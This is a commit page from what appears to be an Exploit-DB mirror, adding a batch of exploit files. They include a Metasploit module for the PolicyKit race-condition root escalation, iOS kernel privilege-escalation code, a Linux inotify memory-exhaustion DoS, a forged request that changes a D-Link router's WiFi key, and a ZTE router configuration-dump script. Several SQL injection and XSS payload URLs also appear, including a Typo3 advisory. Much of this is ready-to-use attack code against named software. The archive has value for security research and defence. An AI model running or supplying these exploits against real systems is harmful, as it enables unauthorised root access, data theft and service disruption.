bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1

Updated 10_22_2014

Browse source
This commit is contained in:
Offensive Security 2014-10-22 04:44:36 +00:00
parent 195bc38235
commit a7cf4f066c
18 changed files with 1291 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

17
files.csv
View file

@ -31228,6 +31228,7 @@ id,file,description,date,author,platform,type,port
34677,platforms/php/webapps/34677.txt,"WebStatCaffe stat/pageviewers.php date Parameter XSS",2009-08-29,Moudi,php,webapps,0
34678,platforms/php/webapps/34678.txt,"WebStatCaffe stat/pageviewerschart.php date Parameter XSS",2009-08-29,Moudi,php,webapps,0
34679,platforms/php/webapps/34679.txt,"WebStatCaffe stat/referer.php date Parameter XSS",2009-08-29,Moudi,php,webapps,0
34680,platforms/hardware/webapps/34680.txt,"ZTE ZXDSL-931VII - Unauthenticated Configuration Dump",2014-09-16,"L0ukanik0-s S0kniaku0l",hardware,webapps,0
34681,platforms/php/webapps/34681.txt,"Wordpress Slideshow Gallery 1.4.6 - Shell Upload (Python Exploit)",2014-09-16,"Claudio Viviani",php,webapps,0
34682,platforms/ios/webapps/34682.txt,"USB&WiFi Flash Drive 1.3 iOS - Code Execution Vulnerability",2014-09-16,Vulnerability-Lab,ios,webapps,8080
34683,platforms/php/webapps/34683.txt,"e-soft24 Article Directory Script 'q' Parameter Cross Site Scripting Vulnerability",2009-08-30,"599eme Man",php,webapps,0
@ -31333,6 +31334,7 @@ id,file,description,date,author,platform,type,port
34796,platforms/multiple/remote/34796.txt,"Oracle MySQL Prior to 5.1.50 Privilege Escalation Vulnerability",2010-08-03,"Libing Song",multiple,remote,0
34797,platforms/php/webapps/34797.txt,"SurgeMail SurgeWeb 4.3e Cross Site Scripting Vulnerability",2010-10-04,"Kerem Kocaer",php,webapps,0
34798,platforms/php/webapps/34798.txt,"ITS SCADA Username SQL Injection Vulnerability²",2010-10-04,"Eugene Salov",php,webapps,0
34800,platforms/php/webapps/34800.txt,"Typo3 JobControl 2.14.0 - Cross Site Scripting / SQL Injection",2014-09-27,"Adler Freiheit",php,webapps,0
34802,platforms/hardware/remote/34802.html,"Research In Motion BlackBerry Device Software <= 4.7.1 Cross Domain Information Disclosure Vulnerability",2010-10-04,"599eme Man",hardware,remote,0
34803,platforms/php/webapps/34803.txt,"Online Guestbook Pro 5.1 'ogp_show.php' Cross Site Scripting Vulnerability",2009-07-09,Moudi,php,webapps,0
34804,platforms/php/webapps/34804.txt,"Rentventory 'index.php' Multiple Cross Site Scripting Vulnerabilities",2009-07-07,"599eme Man",php,webapps,0
@ -31521,3 +31523,18 @@ id,file,description,date,author,platform,type,port
35004,platforms/php/webapps/35004.txt,"CompactCMS 1.4.1 Multiple Cross Site Scripting Vulnerabilities",2010-11-18,"High-Tech Bridge SA",php,webapps,0
35005,platforms/windows/remote/35005.html,"WebKit Insufficient Entropy Random Number Generator Weakness (1)",2010-11-18,"Amit Klein",windows,remote,0
35006,platforms/windows/remote/35006.html,"WebKit Insufficient Entropy Random Number Generator Weakness (2)",2010-11-18,"Amit Klein",windows,remote,0
35007,platforms/windows/remote/35007.c,"Native Instruments Multiple Products DLL Loading Arbitrary Code Execution Vulnerability",2010-11-19,"Gjoko Krstic",windows,remote,0
35008,platforms/cgi/webapps/35008.txt,"Hot Links SQL 3.2 'report.cgi' SQL Injection Vulnerability",2010-11-22,"Aliaksandr Hartsuyeu",cgi,webapps,0
35009,platforms/php/webapps/35009.txt,"AuraCMS 1.62 'pdf.php' SQL Injection Vulnerability",2010-11-22,"Don Tukulesto",php,webapps,0
35010,platforms/osx/local/35010.c,"Apple iOS <= 4.0.2 Networking Packet Filter Rules Local Privilege Escalation Vulnerability",2010-11-22,Apple,osx,local,0
35011,platforms/linux/remote/35011.txt,"Apache Tomcat <= 7.0.4 'sort' and 'orderBy' Parameters Cross Site Scripting Vulnerabilities",2010-11-22,"Adam Muntner",linux,remote,0
35012,platforms/multiple/webapps/35012.txt,"ZyXEL P-660R-T1 V2 'HomeCurrent_Date' Parameter Cross-Site Scripting Vulnerability",2010-11-23,"Usman Saeed",multiple,webapps,0
35013,platforms/linux/dos/35013.c,"Linux Kernel 2.6.x 'inotify_init()' Memory Leak Local Denial of Service Vulnerability",2010-11-24,"Vegard Nossum",linux,dos,0
35014,platforms/hardware/remote/35014.txt,"D-Link DIR-300 WiFi Key Security Bypass Vulnerability",2010-11-24,"Gaurav Saha",hardware,remote,0
35015,platforms/cgi/webapps/35015.txt,"SimpLISTic SQL 2.0 'email.cgi' Cross Site Scripting Vulnerability",2010-11-24,"Aliaksandr Hartsuyeu",cgi,webapps,0
35016,platforms/php/webapps/35016.txt,"Easy Banner 2009.05.18 member.php Multiple Parameter SQL Injection Authentication Bypass",2010-11-26,"Aliaksandr Hartsuyeu",php,webapps,0
35017,platforms/php/webapps/35017.txt,"Easy Banner 2009.05.18 index.php Multiple Parameter XSS",2010-11-26,"Aliaksandr Hartsuyeu",php,webapps,0
35019,platforms/windows/local/35019.py,"Windows OLE Package Manager SandWorm Exploit",2014-10-20,"Vlad Ovtchinikov",windows,local,0
35020,platforms/win32/local/35020.rb,"MS14-060 Microsoft Windows OLE Package Manager Code Execution",2014-10-20,metasploit,win32,local,0
35021,platforms/linux/local/35021.rb,"Linux PolicyKit Race Condition Privilege Escalation",2014-10-20,metasploit,linux,local,0
35022,platforms/php/webapps/35022.txt,"4homepages 4images 1.7.x 'categories.php' Parameter SQL Injection Vulnerability",2010-11-29,"Ahmed Atif",php,webapps,0

Can't render this file because it is too large.

9
platforms/cgi/webapps/35008.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45000/info
Hot Links SQL is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Hot Links SQL 3.2.0 is vulnerable; other versions may also be affected.
http://www.example.com/report.cgi?id=999; or 'a'='a

9
platforms/cgi/webapps/35015.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45040/info
SimpLISTic SQL is prone to a cross-site-scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
SimpLISTic SQL 2.0 is vulnerable; other versions may also be affected.
Email: email@example.com&lt;/textarea&gt;<script>alert(&#039;XSS vulnerability&#039;)</script>

19
platforms/hardware/remote/35014.txt Executable file
View file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/45038/info
The D-Link DIR-300 wireless router is prone to a security-bypass vulnerability.
Remote attackers can exploit this issue to modify the WiFi key and possibly other configuration settings. Successful exploits will lead to other attacks.
POST http://www.example.com/bsc_wlan.php HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml
Accept-Charset: ISO-8859-1,utf-8
Keep-Alive: 115
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 1000
ACTION_POST=final&f_enable=1&f_wps_enable=1&f_ssid=KingGeorgeV&f_channel=6&f_auto_channel=0&f_super_g=&f_xr=&f_txrate=0&f_wmm_enable=0&f_ap_hidden=0&f_authentication=7&f_cipher=2&f_wep_len=&f_wep_format=&f_wep_def_key=&f_wep=&f_wpa_psk_type=1&f_wpa_psk=
<<the_wifi_password_here>>&f_radius_ip1=&f_radius_port1=&f_radius_secret1=

94
platforms/hardware/webapps/34680.txt Executable file
View file

@ -0,0 +1,94 @@
# Exploit Title: ZTE ZXDSL-931VII Unauthenticated Configuration Dump
# Google Dork: use your imagination
# Date: 09-12-2014
# Exploit Author: L0ukanik0sGR
# Vendor Homepage: www.zte.com.cn
# Software Link: https://www.ote.gr/web/guest/help-and-support/internet/vdsl/-/support/article/870213%3Bjsessionid=01605E58A483CF54BB0E95208F531764.node3_1_OTEGR?! original firmware for that device could not be found but it works to all zte devices with custom ISP firmware :)
# Version: 931vii,w300 and all zte products running that firmware
# Tested on: linux other os compatible
# CVE : None yet it's a 0day
ZTE ZXDSL-931VII Unauthenticated Configuration Dump
Unauthenticated Configuration File Download and
Decompression of the _config.bin file
by L0ukanik0s,GR 2014,l0ukanik0s@hotmail.com
Exploit PoC:
1. Go to http://router-ip/ manager_dev_config_t.gch
2.
Click on 'Backup Configuration' and obtain the _config.bin
3.
Download python script from http://pastebin.com/i6dfsL5D
4.
Then compile and run zte-0day.py (root@l0ukanik0s:~# python zte-0day.py)
5.
Insert the path of the _config.bin file hit 'ENTER'
6.
Enjoy your configuration dump
#!/usr/bin/env python
import zlib
#scripte originated from http://reverseengineering.stackexchange.com/questions/3593/re-compressed-backup-file-router-linux-based-so-is-it-compresed-with-zlib
print "################################################"
print "# THe W0lf is so close #"
print "# ZTE 931Vii Router configuration unpacker #"
print "# Find configuration file @ #"
print "# http://192.168.1.1/manager_dev_config_t.gch #"
print "# L0ukanik0s 2014 Hack-Hosting #"
print "# l0ukanik0s@hotmail.com #"
print "################################################"
print "Enter your config.bin path: e.g root@l0ukanik0s:~#/Desktop/931router_config.bin"
configfile = raw_input("File Path :").strip()
magic_numbers = ['\x78\xDA']
filename = configfile
infile = open(filename, 'r')
data = infile.read()
pos = 0
found = False
while pos < len(data):
window = data[pos:pos+2]
for marker in magic_numbers:
if window == marker:
found = True
start = pos
print "Start of zlib %s" % pos
rest_of_data = data[start:]
decomp_obj = zlib.decompressobj()
uncompressed_msg = decomp_obj.decompress(rest_of_data)
print "Configuration of ZTE 931 File Content: %s" % uncompressed_msg
break
if pos == len(data):
break
pos += 1
if found:
header = data[:start]
footer = decomp_obj.unused_data
if not found:
print "Sorry, no zlib found."

23
platforms/linux/dos/35013.c Executable file
View file

@ -0,0 +1,23 @@
source: http://www.securityfocus.com/bid/45036/info
The Linux kernel is prone to a local denial-of-service vulnerability.
Attackers can exploit this issue to cause an out-of-memory condition, denying service to legitimate users.
#include <sys/inotify.h>
#include <unistd.h>
int main(int argc, char *argv[])
{
int fds[2];
/* Circumvent max inotify instances limit */
while (pipe(fds) != -1)
;
while (1)
inotify_init();
return 0;
}

354
platforms/linux/local/35021.rb Executable file
View file

@ -0,0 +1,354 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class Metasploit4 < Msf::Exploit::Local
Rank = GreatRanking
include Msf::Exploit::EXE
include Msf::Post::File
include Msf::Exploit::Local::Linux
def initialize(info = {})
super(update_info(info,
'Name' => 'Linux PolicyKit Race Condition Privilege Escalation',
'Description' => %q(
A race condition flaw was found in the PolicyKit pkexec utility and polkitd
daemon. A local user could use this flaw to appear as a privileged user to
pkexec, allowing them to execute arbitrary commands as root by running
those commands with pkexec.
Those vulnerable include RHEL6 prior to polkit-0.96-2.el6_0.1 and Ubuntu
libpolkit-backend-1 prior to 0.96-2ubuntu1.1 (10.10) 0.96-2ubuntu0.1
(10.04 LTS) and 0.94-1ubuntu1.1 (9.10)
),
'License' => MSF_LICENSE,
'Author' =>
[
'xi4oyu', # exploit
'0a29406d9794e4f9b30b3c5d6702c708' # metasploit module
],
'Platform' => [ 'linux'],
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' =>
[
[ 'Linux x86', { 'Arch' => ARCH_X86 } ],
[ 'Linux x64', { 'Arch' => ARCH_X86_64 } ]
],
'DefaultTarget' => 0,
'References' =>
[
[ 'CVE', '2011-1485' ],
[ 'EDB', '17942' ],
[ 'OSVDB', '72261' ]
],
'DisclosureDate' => "Apr 01 2011"
))
register_options([
OptString.new("WritableDir", [ true, "A directory where we can write files (must not be mounted noexec)", "/tmp" ]),
OptInt.new("Count", [true, "Number of attempts to win the race condition", 500 ]),
OptInt.new("ListenerTimeout", [true, "Number of seconds to wait for the exploit", 60]),
OptBool.new("DEBUG", [ true, "Make the exploit executable be verbose about what it's doing", false ])
])
end
def executable_path
@executable_path ||= datastore["WritableDir"] + "/" + rand_text_alphanumeric(8)
@executable_path
end
def exploit
main = %q^
/*
* Exploit Title: pkexec Race condition (CVE-2011-1485) exploit
* Author: xi4oyu
* Tested on: rhel 6
* CVE : 2011-1485
* Linux pkexec exploit by xi4oyu , thx dm@0x557.org * Have fun~
* U can reach us @ http://www.wooyun.org :)
* 0a2940: some changes
*/
/*
#include <stdio.h>
#include <limits.h>
#include <time.h>
#include <unistd.h>
#include <termios.h>
#include <sys/stat.h>
#include <errno.h>
#include <poll.h>
#include <sys/types.h>
#include <stdlib.h>
#include <string.h>
*/
#define dprintf
#define NULL ((void*)0)
#define MAP_PRIVATE 0x02
#define MAP_FIXED 0x10
#define MAP_ANONYMOUS 0x20
#define MAP_ANON MAP_ANONYMOUS
#define MAP_FAILED ((void *)-1)
#define PROT_READ 0x1
#define PROT_WRITE 0x2
#define PROT_EXEC 0x4
#define O_CREAT 64
#define O_RDWR 2
#define POLLRDNORM 0x0040
typedef int __pid_t;
typedef int __time_t;
typedef
struct {
long __val[2];
} __quad_t;
typedef __quad_t __dev_t;
typedef long __ino_t;
typedef unsigned long __mode_t;
typedef long __nlink_t;
typedef unsigned int __uid_t;
typedef unsigned int __gid_t;
typedef long long __off_t;
typedef long __blksize_t;
typedef long long __blkcnt_t;
struct _stat_buff {
__dev_t st_dev; /* Device. */
unsigned short int __pad1;
__ino_t st_ino; /* File serial number. */
__mode_t st_mode; /* File mode. */
__nlink_t st_nlink; /* Link count. */
__uid_t st_uid; /* User ID of the file's owner. */
__gid_t st_gid; /* Group ID of the file's group.*/
__dev_t st_rdev; /* Device number, if device. */
unsigned short int __pad2;
__off_t st_size; /* Size of file, in bytes. */
__blksize_t st_blksize; /* Optimal block size for I/O. */
__blkcnt_t st_blocks; /* Number 512-byte blocks allocated. */
__time_t st_atime; /* Time of last access. */
unsigned long int st_atimensec; /* Nscecs of last access. */
__time_t st_mtime; /* Time of last modification. */
unsigned long int st_mtimensec; /* Nsecs of last modification. */
__time_t st_ctime; /* Time of last status change. */
unsigned long int st_ctimensec; /* Nsecs of last status change. */
unsigned long int __unused4;
unsigned long int __unused5;
};
struct _pollfd {
int fd; /* file descriptor */
short events; /* requested events */
short revents; /* returned events */
};
typedef unsigned long size_t;
extern void *mmap(void *__addr, size_t __len, int __prot, int __flags, int __fd, __off_t __offset);
extern int mprotect(void *__addr, size_t __len, int __prot);
extern void exit(int __status);
extern int printf(const char *__format, ...);
extern __pid_t fork(void);
extern __time_t time(__time_t *t);
extern __pid_t getpid(void);
extern __uid_t geteuid(void);
extern void srand(unsigned int seed);
extern int snprintf(char *str, size_t size, const char *format, ...);
extern int pipe(int pipefd[2]);
extern int close(int fd);
extern void write(int fd, const void *buf, size_t count);
extern int dup2(int oldfd, int newfd);
extern void perror(const char *__s);
extern void read(int fd, void *buf, size_t count);
extern int execve(const char *filename, char *const argv[], char *const envp);
extern int usleep(int usec);
extern void *memset(void *s, int c, size_t n);
extern void *memcpy(void * dst, const void *src, size_t n);
extern int poll(struct _pollfd *fds, unsigned int nfds, int timeout);
extern char *strstr(const char *haystack, const char *needle);
extern int rand(void);
extern int unlink(const char *__name);
int main(int argc,char *argv[], char ** envp)
{
__time_t tim_seed1;
__pid_t pid_seed2;
int result;
struct _stat_buff stat_buff;
char * chfn_path = "/usr/bin/chfn";
char * cmd_path = "";
char * pkexec_argv[] = {
"/usr/bin/pkexec",
"/bin/sh",
"-c",
cmd_path,
NULL
};
int pipe1[2];
int pipe2[2];
int pipe3[2];
__pid_t pid,pid2 ;
char * chfn_argv[] = {
"/usr/bin/chfn",
NULL
};
char buff[8];
char read_buff[4096];
char real_path[512];
int count = 0;
int flag = 0;
unsigned int usleep1 = 0;
unsigned int usleep2 = 0;
tim_seed1 = time(NULL);
pid_seed2 = getpid();
srand(tim_seed1+pid_seed2);
if(!geteuid()){
unlink(cmd_path);
SHELLCODE
int shellcode_size = 0;
int i;
unsigned long (*func)();
func = mmap(NULL, 0x1000,
PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_PRIVATE | MAP_ANONYMOUS,
0, 0
);
mprotect(func, 4096, PROT_READ|PROT_WRITE|PROT_EXEC);
dprintf("Copying %d bytes of shellcode\n", shellcode_size);
//for (i = 0; i < shellcode_size; i++) {
//(char)func[i] = (char)shellcode[i];
memcpy(func,shellcode,shellcode_size);
//}
dprintf("Forking before calling shellcode: 0x%p\n", func);
if (fork()) {
exit(0);
}
func();
}
if(pipe(pipe1)){
perror("pipe");
exit(-2);
}
for(count = COUNT; count && !flag; count--){
dprintf("count %d usleep1 %d usleep2 %d\n",count,usleep1,usleep2);
pid = fork();
if( !pid ){
// Parent
if( !pipe(pipe2)){
if(!pipe(pipe3)){
pid2 = fork();
if(!pid2){
// Parent 2
close(1);
close(2);
close(pipe1[0]);
dup2(pipe1[1],2);
dup2(pipe1[1],1);
close(pipe1[1]);
close(pipe2[0]);
close(pipe3[1]);
write(pipe2[1],"\xFF",1);
read(pipe3[0],&buff,1);
execve(pkexec_argv[0],pkexec_argv,envp);
perror("execve pkexec");
exit(-3);
}
close(0);
close(1);
close(2);
close(pipe2[1]);
close(pipe3[0]);
read(pipe2[0],&buff,1);
write(pipe3[1],"\xFF",1);
usleep(usleep1+usleep2);
execve(chfn_argv[0],chfn_argv,envp);
perror("execve setuid");
exit(1);
}
}
perror("pipe3");
exit(1);
}
//Note: This is child, no pipe3 we use poll to monitor pipe1[0]
memset(pipe3,0,8);
struct _pollfd * pollfd = (struct pollfd *)(&pipe3);
pollfd->fd = pipe1[0];
pollfd->events = POLLRDNORM;
if(poll(pollfd,1,1000) < 0){
perror("poll");
exit(1);
}
if(pollfd->revents & POLLRDNORM ){
memset(read_buff,0,4096);
read(pipe1[0],read_buff,4095);
if( strstr(read_buff,"does not match")){
usleep1 += 100;
usleep2 = rand() % 1000;
}else{
if(usleep1 > 0){
usleep1 -= 100;
}
}
}
}
result = 0;
unlink(cmd_path);
return result;
}
^
main.gsub!(/SHELLCODE/, Rex::Text.to_c(payload.encoded, 64, "shellcode"))
main.gsub!(/shellcode_size = 0/, "shellcode_size = #{payload.encoded.length}")
main.gsub!(/cmd_path = ""/, "cmd_path = \"#{executable_path}\"")
main.gsub!(/COUNT/, datastore["Count"].to_s)
main.gsub!(/#define dprintf/, "#define dprintf printf") if datastore['DEBUG']
cpu = nil
if target['Arch'] == ARCH_X86
cpu = Metasm::Ia32.new
elsif target['Arch'] == ARCH_X86_64
cpu = Metasm::X86_64.new
end
begin
elf = Metasm::ELF.compile_c(cpu, main).encode_string
rescue
print_error "Metasm Encoding failed: #{$ERROR_INFO}"
elog "Metasm Encoding failed: #{$ERROR_INFO.class} : #{$ERROR_INFO}"
elog "Call stack:\n#{$ERROR_INFO.backtrace.join("\n")}"
return
end
print_status "Writing exploit executable to #{executable_path} (#{elf.length} bytes)"
rm_f executable_path
write_file(executable_path, elf)
output = cmd_exec("chmod +x #{executable_path}; #{executable_path}")
output.each_line { |line| print_debug line.chomp }
stime = Time.now.to_f
print_status "Starting the payload handler..."
until session_created? || stime + datastore['ListenerTimeout'] < Time.now.to_f
Rex.sleep(1)
end
end
end

7
platforms/linux/remote/35011.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/45015/info
Apache Tomcat is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
http:/www.example.com/html/sessions?path=/&sort=[xss]

7
platforms/multiple/webapps/35012.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/45027/info
ZyXEL P-660R-T1 V2 is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/Forms/home_1?&HomeCurrent_Date=&#039;<sCript>alert(1);</ScRiPt>&#039;01%2F01%2F2000

185
platforms/osx/local/35010.c Executable file
View file

@ -0,0 +1,185 @@
source: http://www.securityfocus.com/bid/45010/info
Apple iOS is prone to a local privilege-escalation vulnerability.
Local attackers running malicious code can exploit this issue to elevate their privileges. Successful attacks will completely compromise an affected device.
int main() {
unsigned int target_addr = CONFIG_TARGET_ADDR;
unsigned int target_addr_real = target_addr & ~1;
unsigned int target_pagebase = target_addr & ~0xfff;
unsigned int num_decs = (CONFIG_SYSENT_PATCH_ORIG - target_addr) >> 24;
assert(MAP_FAILED != mmap((void *) target_pagebase, 0x2000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE | MAP_FIXED, -1, 0));
unsigned short *p = (void *) target_addr_real;
if(target_addr_real & 2) *p++ = 0x46c0; // nop
*p++ = 0x4b00; // ldr r3, [pc]
*p++ = 0x4718; // bx r3
*((unsigned int *) p) = (unsigned int) &ok_go;
assert(!mprotect((void *)target_pagebase, 0x2000, PROT_READ | PROT_EXEC));
// Yes, reopening is necessary
pffd = open("/dev/pf", O_RDWR);
ioctl(pffd, DIOCSTOP);
assert(!ioctl(pffd, DIOCSTART));
unsigned int sysent_patch = CONFIG_SYSENT_PATCH;
while(num_decs--)
pwn(sysent_patch+3);
assert(!ioctl(pffd, DIOCSTOP));
close(pffd);
assert(!mlock((void *) ((unsigned int)(&ok_go) & ~0xfff), 0x1000));
assert(!mlock((void *) ((unsigned int)(&flush) & ~0xfff), 0x1000));
assert(!mlock((void *) target_pagebase, 0x2000));
#ifdef DEBUG
printf("ok\n"); fflush(stdout);
#endif
syscall(0);
#ifdef DEBUG
printf("we're out\n"); fflush(stdout);
#endif
//...
}
//...
static void pwn(unsigned int addr) {
struct pfioc_trans trans;
struct pfioc_trans_e trans_e;
struct pfioc_pooladdr pp;
struct pfioc_rule pr;
memset(&trans, 0, sizeof(trans));
memset(&trans_e, 0, sizeof(trans_e));
memset(&pr, 0, sizeof(pr));
trans.size = 1;
trans.esize = sizeof(trans_e);
trans.array = &trans_e;
trans_e.rs_num = PF_RULESET_FILTER;
memset(trans_e.anchor, 0, MAXPATHLEN);
assert(!ioctl(pffd, DIOCXBEGIN, &trans));
u_int32_t ticket = trans_e.ticket;
assert(!ioctl(pffd, DIOCBEGINADDRS, &pp));
u_int32_t pool_ticket = pp.ticket;
pr.action = PF_PASS;
pr.nr = 0;
pr.ticket = ticket;
pr.pool_ticket = pool_ticket;
memset(pr.anchor, 0, MAXPATHLEN);
memset(pr.anchor_call, 0, MAXPATHLEN);
pr.rule.return_icmp = 0;
pr.rule.action = PF_PASS;
pr.rule.af = AF_INET;
pr.rule.proto = IPPROTO_TCP;
pr.rule.rt = 0;
pr.rule.rpool.proxy_port[0] = htons(1);
pr.rule.rpool.proxy_port[1] = htons(1);
pr.rule.src.addr.type = PF_ADDR_ADDRMASK;
pr.rule.dst.addr.type = PF_ADDR_ADDRMASK;
//offsetof(struct pfr_ktable, pfrkt_refcnt[PFR_REFCNT_RULE]) = 0x4a4
pr.rule.overload_tbl = (void *)(addr - 0x4a4);
errno = 0;
assert(!ioctl(pffd, DIOCADDRULE, &pr));
assert(!ioctl(pffd, DIOCXCOMMIT, &trans));
pr.action = PF_CHANGE_REMOVE;
assert(!ioctl(pffd, DIOCCHANGERULE, &pr));
}
########################################################################################################
The vulnerability is located in the DIOCADDRULE ioctl handler, due to improper initialization of the overload_tbl field, which can be later exploited in the DIOCCHANGERULE handler. The following code snippet shows the relevant parts of those handlers :
########################################################################################################
//bsd/net/pf_ioctl.c
static int
pfioctl(dev_t dev, u_long cmd, caddr_t addr, int flags, struct proc *p)
{
//...
switch (cmd) {
//...
case DIOCADDRULE: {
struct pfioc_rule *pr = (struct pfioc_rule *)addr;
struct pf_ruleset *ruleset;
//...
//copy structure passed from userspace
bcopy(&pr->rule, rule, sizeof (struct pf_rule));
rule->cuid = kauth_cred_getuid(p->p_ucred);
rule->cpid = p->p_pid;
rule->anchor = NULL;
rule->kif = NULL;
TAILQ_INIT(&rule->rpool.list);
/* initialize refcounting */
rule->states = 0;
rule->src_nodes = 0;
rule->entries.tqe_prev = NULL;
//...
if (rule->overload_tblname[0]) {
if ((rule->overload_tbl = pfr_attach_table(ruleset,
rule->overload_tblname)) == NULL)
error = EINVAL;
else
rule->overload_tbl->pfrkt_flags |=
PFR_TFLAG_ACTIVE;
}
//...
case DIOCCHANGERULE: {
//...
if (pcr->action == PF_CHANGE_REMOVE) {
pf_rm_rule(ruleset->rules[rs_num].active.ptr, oldrule);
ruleset->rules[rs_num].active.rcount--;
}
//...
}
//...
}
################################################################################################
The rule field of the pfioc_rule structure passed from userland is copied into a kernel buffer, and then some of the structure fields are reinitialized. However, if rule->overload_tblname[0] is zero, the rule->overload_tbl pointer won't be initialized properly and will retain the value passed from userland. When the rule is removed, the pf_rm_rule function calls pfr_detach_table which in turn decrements a reference counter using the invalid pointer, allowing an arbitrary decrement anywhere in kernel memory :
##############################################################################################
//bsd/net/pf_ioctl.c
void
pf_rm_rule(struct pf_rulequeue *rulequeue, struct pf_rule *rule)
{
if (rulequeue != NULL) {
if (rule->states <= 0) {
/*
* XXX - we need to remove the table *before* detaching
* the rule to make sure the table code does not delete
* the anchor under our feet.
*/
pf_tbladdr_remove(&rule->src.addr);
pf_tbladdr_remove(&rule->dst.addr);
if (rule->overload_tbl)
pfr_detach_table(rule->overload_tbl);
}
//...
}
//bsd/net/pf_table.c
void
pfr_detach_table(struct pfr_ktable *kt)
{
lck_mtx_assert(pf_lock, LCK_MTX_ASSERT_OWNED);
if (kt->pfrkt_refcnt[PFR_REFCNT_RULE] <= 0)
printf("pfr_detach_table: refcount = %d.\n",
kt->pfrkt_refcnt[PFR_REFCNT_RULE]);
else if (!--kt->pfrkt_refcnt[PFR_REFCNT_RULE]) //arbitrary decrement happens here
pfr_setflags_ktable(kt, kt->pfrkt_flags&~PFR_TFLAG_REFERENCED);
}
###############################################################################################
In order to decrement the dword at address addr, the pwn function of comex's exploit sets the pr.rule.overload_tbl to addr minus 0x4a4, which is the value of offsetof(struct pfr_ktable, pfrkt_refcnt[PFR_REFCNT_RULE]) on a 32 bit architecture. The exploit decrement the syscall 0 handler address in the sysent array which holds function pointers for all system calls. A trampoline shellcode is mapped at a specific address chosen so that only the most significant byte of the original pointer has to be decremented (the minimum amount to move the pointer from kernel space down to user space). This trampoline will simply call the ok_go C function which will patch various functions in the kernel to perform the jailbreak : make code signing checks return true, disable W^X policy, and restore the overwritten syscall handler.

120
platforms/php/webapps/34800.txt Executable file
View file

@ -0,0 +1,120 @@
Mogwai Security Advisory MSA-2014-02
----------------------------------------------------------------------
Title: JobControl (dmmjobcontrol) Multiple Vulnerabilities
Product: dmmjobcontrol (Typo3 Extension)
Affected versions: 2.14.0
Impact: high
Remote: yes
Product link: http://typo3.org/extensions/repository/view/dmmjobcontrol
Reported: 05/09/2014
by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench)
Vendor's Description of the Software:
----------------------------------------------------------------------
JobControl (dmmjobcontrol) is a TYPO3 extension for showing jobs
("vacancies") on your website. It provides a list- and detail view and
the ability to search and apply for jobs. It can even make RSS feeds of
your joblist.
It works with html templates so it's easy to configure how the extension
will look for your site. The list can be shown as a "paginated list",
including a page-browser. The extension itself is multi-lingual, at this
moment English, Danish, Polish, German, Russian and Dutch are included.
The best feature however is that multi-lingual jobs are fully supported
too, so you can provide a translation for a job if you have a multi-lingual
site.
JobControl uses MM-relation tables for regions, branches, sectors etc.
This means that for every new site, you can make a new list of branches to
use. They are not hardcoded and don't require any TypoScript to set up.
JobControl is very easy to set up, with good default templates that can
be styled to your needs using css stylesheets. It's very powerful and
flexible too with lots of configuration options for advanced users.
Business recommendation:
----------------------------------------------------------------------
According to the Typo3 Security Team the extension maintainer does not
maintain the extension any longer and thus, is not providing an update.
Exploitation can be prevented with the workaround below. However, the
extension should be replaced with a maintained alternative.
Vulnerability description:
----------------------------------------------------------------------
1) Unauthenticated Blind SQL Injection
dmmjobcontrol provides a search function for the job database. Several
input fields (for example education, region, sector) are used without
proper sanitization to create the SELECT statement of the search query.
2) Reflected Cross Site Scripting (XSS)
The value of the "keyword" parameter is used without any sanitization
to create the html response of the search request. This can be abused
to inject malicious HTML/JavaScript code into the HTML response.
Proof of concept:
----------------------------------------------------------------------
1) Unauthenticated Blind SQL Injection
The following PoC shows blind based SQL injection on the sector parameter, other
parameters are also vulnerable
http://xxxx/jobs/?tx_dmmjobcontrol_pi1%5Bsearch_submit%5D=Search&tx_dmmjobcontrol_pi1%5Bsearch%5D%5Bsector%5D%5B%5D=3%29and%20benchmark%2820000000%2csha1%281%29%29--%20
2) Reflected Cross Site Scripting (XSS)
http://172.16.37.232/typo3/jobs/?tx_dmmjobcontrol_pi1%5Bsearch_submit%5D=Search&tx_dmmjobcontrol_pi1%5Bsearch%5D%5Bkeyword%5D=">
Vulnerable / tested versions:
----------------------------------------------------------------------
dmmjobcontrol 2.14.0
Disclosure timeline:
----------------------------------------------------------------------
05/09/2014: Reporting to the Typo3 Security team
05/09/2014: Response from Typo3 Security team that they received the mail
24/09/2014: Mail to Typo3 Security team, asking for the current status
25/09/2014: Response from Typo3 Security Team that they released an advisory[1]
25/09/2014: Release of public advisory
Workaround (use on your own responsiblity):
----------------------------------------------------------------------
In the file:
typo3conf/ext/dmmjobcontrol/pi1/class.tx_dmmjobcontrol_pi1.php
To fix the Cross Site Scripting (XSS) vulnerability, replace line 112 with the
following PHP code:
$markerArray['###KEYWORD_VALUE###'] =
